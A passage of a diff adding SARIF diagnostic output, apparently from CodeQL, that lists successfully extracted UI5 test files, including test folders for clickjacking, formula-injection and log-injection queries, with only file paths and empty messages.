{ + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", + "uriBaseId" : "%SRCROOT%", + "index" : 125 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 126 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 127 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 128 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 129 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 130 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 131 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 132 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 133 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 134 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 135 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 137 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 138 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 139 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 140 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 141 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 142 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 143 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 144 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 146 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 147 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 148 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 149 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 151 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 152 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 153 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 155 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 156 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 157 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 158 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 160 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 161 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 162 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 164 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 165 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 167 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 168 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 169 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 170 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 173 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 174 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 176 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 177 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 178 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 180 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 181 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 182 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 183 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 185 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + 